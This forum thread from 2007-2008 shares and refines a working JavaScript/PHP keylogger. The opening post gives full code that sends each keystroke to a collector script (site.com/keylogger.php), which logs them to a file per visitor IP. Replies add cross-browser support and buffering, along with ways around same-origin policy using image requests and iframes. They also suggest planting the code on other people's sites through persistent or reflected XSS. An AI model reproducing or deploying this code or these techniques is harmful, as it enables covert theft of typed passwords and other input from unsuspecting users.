Government Security
Network Security Resources

Jump to content

Photo

Ajax Keylogger.

- - - - - server javascript php xml keylogger
  • Please log in to reply
16 replies to this topic

#1 METAHUMAN

METAHUMAN

    Private First Class

  • Members
  • 28 posts

Posted 08 April 2007 - 05:44 AM

Not my stuff. Found else where. Posting here.

Keylogger.JS
function whichButton(event)
{
var keya = "";
keya = event.keyCode;
makeRequest('http://site.com/keylogger.php?iambr=' + keya);
}

function makeRequest(url)
{
var httpRequest;

if (window.XMLHttpRequest)
{ // Mozilla, Safari, ...
httpRequest = new XMLHttpRequest();
if (httpRequest.overrideMimeType) {
httpRequest.overrideMimeType('text/xml');
}
} 
else if (window.ActiveXObject)
{ // IE
try
{
httpRequest = new ActiveXObject("Msxml2.XMLHTTP");
} 
catch (e) {
try {
httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
} 
catch (e) {}
}
}

if (!httpRequest)
{
alert('Giving up :( Cannot create an XMLHTTP instance');
return false;
}
httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
httpRequest.open('GET', url, true);
httpRequest.send(null);
}

function alertContents(httpRequest)
{
if (httpRequest.readyState == 4) {
if (httpRequest.status == 200) {
}
else
{
alert('There was a problem with the request.');
}
}
}

Keylogger.PHP
<?php
$_GET['iambr'];
$file = fopen($_SERVER['REMOTE_ADDR'] . ".txt","a");
fwrite($file,$_GET['iambr'] . '||');
fclose($file);
?>

index.htm
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="JavaScript" SRC="keylogger.js"></SCRIPT>
</head>
<body onkeyup="whichButton(event)">
<p><b>Note:</b> Make sure the right frame has focus when trying this example!</p>
<p>Press a key on your keyboard. An alert box will alert the unicode of the key pressed.</p>
</body>
</html>

(:

#2 raif

raif

    Staff Sergeant

  • Sergeant Major
  • 275 posts

Posted 08 April 2007 - 06:34 AM

small improvement. it will now do keylogging for firefox(and probably other netscape/mozilla based browsers). and because of the String.fromCharCode it will log the actual letter rather than the ascii code for it.

function whichButton(e)
{
var keya = "";
var isNetscape = (navigator.appName.indexOf("Netscape") != -1);
var keya = (isNetscape) ? String.fromCharCode(e.which) : String.fromCharCode(e.keyCode);
makeRequest('http://site.com/keylogger.php?iambr=' + keya);
}


#3 setthesun

setthesun

    Sergeant First Class

  • Sergeant Major
  • 574 posts

Posted 10 April 2007 - 12:07 AM

I hope you know that it's not gonna work when it's under another domain and throw security error in IE and FF. But still you can use under your own domain.

setthesun me = new setthesun();

#4 raif

raif

    Staff Sergeant

  • Sergeant Major
  • 275 posts

Posted 10 April 2007 - 06:50 AM

or you can inject the javascript through an xss hole and use it on someone else's domain. but the same domain policy for xmlhttprequest will prevent it from working on more than one at a time.

#5 setthesun

setthesun

    Sergeant First Class

  • Sergeant Major
  • 574 posts

Posted 10 April 2007 - 07:24 AM

Nope, it's not going to work because of same origin policy, and not using a buffer before sending keys is a crazy idea ! Slow and bandwidth / process killer.

So basically this is only useful if you got a website which is already controlled by you.

You can make this work cross-domain though. Simply create new image and modify "src" to your server with required query string (which is including recorded keystrokes), that's it.

And it's a good idea to send this request after a buffer or / and onclose() or similar action.

setthesun me = new setthesun();

#6 raif

raif

    Staff Sergeant

  • Sergeant Major
  • 275 posts

Posted 10 April 2007 - 11:55 AM

you can make it work on a domain you don't control if you have an iframe that keeps the keylogger going as long as they are on the same domain. and the buffer is a good idea too. have it send the buffered keystrokes onMouseUp like when they click on a link. just inject the javascript code to create the iframe into an xss hole(whether persistent or reflected). and even if this doesn't work on a site that you don't control(which i think it will..) you can find a site where you can inject xss into a database and just inject all the code in there and it'll work. but i think i'm going to try this out just to make sure that it does work.

#7 Guest_Dennis_*

Guest_Dennis_*
  • Guests

Posted 24 April 2007 - 09:25 AM

think the realtime ajax logging is a bit too much :) It would be cool if it could send it after pressing the submit button. Maybe ill look into it later if i have the time.

#8 t0tum

t0tum

    Private

  • Members
  • 1 posts

Posted 11 July 2007 - 10:00 AM

small improvement. it will now do keylogging for firefox(and probably other netscape/mozilla based browsers). and because of the String.fromCharCode it will log the actual letter rather than the ascii code for it.


And what would be the one for IE, or preferably both?

#9 Guest_berdo_*

Guest_berdo_*
  • Guests

Posted 31 July 2007 - 05:41 AM

hi guys.
maybe you have to improve your keylogger because only chach some letter when you write http://flash-back.caucasus.net/genkey/Keyl...php?iambr=' <something here.
waiting for Ur reply. :rolleyes: if you can do this. ;;)

#10 Guest_berdo_*

Guest_berdo_*
  • Guests

Posted 31 July 2007 - 05:45 AM

and this actually works in mozilla using this way /keylogger.php?iambr='here you can write something. :D

#11 Guest_lomanasq_*

Guest_lomanasq_*
  • Guests

Posted 02 August 2007 - 10:15 PM

spam us then spam him

info removed

#12 Guest_stillbirth_*

Guest_stillbirth_*
  • Guests

Posted 11 August 2007 - 04:10 AM

w0ow very thx dear :ph34r: :ph34r: :ph34r:

#13 gametricker

gametricker

    Private

  • Members
  • 3 posts

Posted 22 January 2008 - 04:43 PM

wow, this is amazing.

I have a "method" of showing it on cross-domain, sort of kind of. :ph34r: , if anyone would want to know, they first have to help me develop a way to record button clicks :D

Cheers,

Edward

#14 extreme

extreme

    Specialist

  • Sergeant Major
  • 615 posts

Posted 23 January 2008 - 08:59 AM

What's the purpose of cross domain keyloggin??? It still has to to be inside of iframe/frame that is located on your website,which is very possible to do..

It is more interesting to find out how to send key using javascript :/

BTW, checkout "onkeypress" or something like that since it should return printable character, and not it's ASCII value
САМО СЛОГА СРБИНА СПАСАВА

#15 Kaiba

Kaiba

    Private First Class

  • Members
  • 55 posts

Posted 22 July 2008 - 11:50 AM

however, using a frame within another website is forbidden in posts or e-mails , at least for good famous ones.
good plan + hard work + deep faith = great success





Also tagged with one or more of these keywords: server, javascript, php, xml, keylogger